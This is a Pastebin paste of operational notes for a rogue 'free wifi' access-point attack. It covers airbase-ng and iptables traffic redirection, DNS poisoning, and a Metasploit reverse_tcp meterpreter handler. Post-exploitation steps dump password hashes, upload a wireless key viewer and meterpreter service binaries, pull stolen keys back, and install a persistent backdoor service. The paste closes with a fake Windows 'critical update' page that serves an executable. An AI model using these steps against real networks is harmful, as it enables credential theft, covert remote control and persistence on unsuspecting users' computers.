Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- dhclient wlan0 //// Connect to the internet, can be eth0
- *****Setup metasploit listener********* ///// u need to create the meterpreter reverse_tcp connection --- information is available in many places http://www.irongeek.com/i.php?page=videos/metasploit-create-reverse-meterpreter-payload-executable
- cd /
- cd pentest
- cd exploits
- cd framework3
- ./msfconsole
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 10.0.0.1
- set LPORT 55555
- show options
- exploit
- modprobe tun
- airbase-ng -P -C 30 -e "free wifi" wlan1 -v ////// can use various commands here
- *************************
- Transparent Airbase
- *************************
- su
- ***************
- ifconfig lo up
- ifconfig at0 up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address
- iptables -P FORWARD ACCEPT
- iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE wlan0 = route to the internet
- /etc/init.d/dhcp3-server restart // backtrack users use dhcpd
- /etc/init.d/lighttpd stop
- lighttpd -D -f '/home/hm/Desktop/http/http' //webserver with fake update page
- **********************************************************************
- direct any request to apache
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 //redirector
- **********************************************************************
- allow traffic again
- ifconfig lo up
- ifconfig at0 up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
- iptables -P FORWARD ACCEPT
- iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
- **************************************************************************
- **************************************************************************
- **************************************************************************
- NON Transparent Airbase
- su
- ***************
- modprobe tun
- airbase-ng -P -C 30 -e "free wifi" wlan1 -v
- su
- ***************
- ifconfig at0 up
- ifconfig lo up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
- iptables -P FORWARD ACCEPT
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
- /etc/init.d/dhcp3-server restart
- /etc/init.d/lighttpd stop
- lighttpd -D -f '/home/hm/Desktop/http/http'
- cd / /// dnspoison available at http://dnspentest.sourceforge.net/
- cd home
- cd hm
- cd Desktop
- cd dnspoison
- java ServerKernelMain 10.0.0.1 10.0.0.1
- ****************************************************************************
- **** Check for victims ********
- arp -n -v -i at0
- session - l
- session -i
- sysinfo
- getuid
- use priv
- hashdump
- ***download keys*****
- mkdir c:\\windows\\wkviewer4
- cd \
- cd windows
- cd wkviewer
- upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless key viewer
- upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... check below
- upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server
- upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
- upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server
- execute -H -f wkv.bat
- cat wkv.txt
- download wkv.txt /home/hm/Desktop/http/wkv.txt
- misc......
- wkv bat file =
- wkv.exe /stabular wkv.txt
- metsvc.exe install-service
- Index html -
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Untitled Document</title>
- <style type="text/css">
- <!--
- .style2 {
- font-family: Arial, Helvetica, sans-serif;
- font-weight: bold;
- font-size: 24px;
- color: #999999;
- }
- .style3 {
- font-family: Arial, Helvetica, sans-serif;
- color: #666666;
- font-weight: bold;
- }
- .style4 {
- font-family: Arial, Helvetica, sans-serif;
- color: #666666;
- font-weight: bold;
- font-size: 24px;
- }
- -->
- </style>
- <script src="/AC_RunActiveContent.js" type="text/javascript"></script>
- </head>
- <body>
- <p><img src="/udntitled.jpg" alt="t" width="1275" height="88" /></p>
- <p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
- <p align="center">
- <input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
- </p>
- <p align="center" class="style2"></p>
- <p> </p>
- <form id="form1" name="form1" method="post" action="/upgrade.exe">
- <label for="D"></label>
- </form>
- <p align="left" class="style4"> </p>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement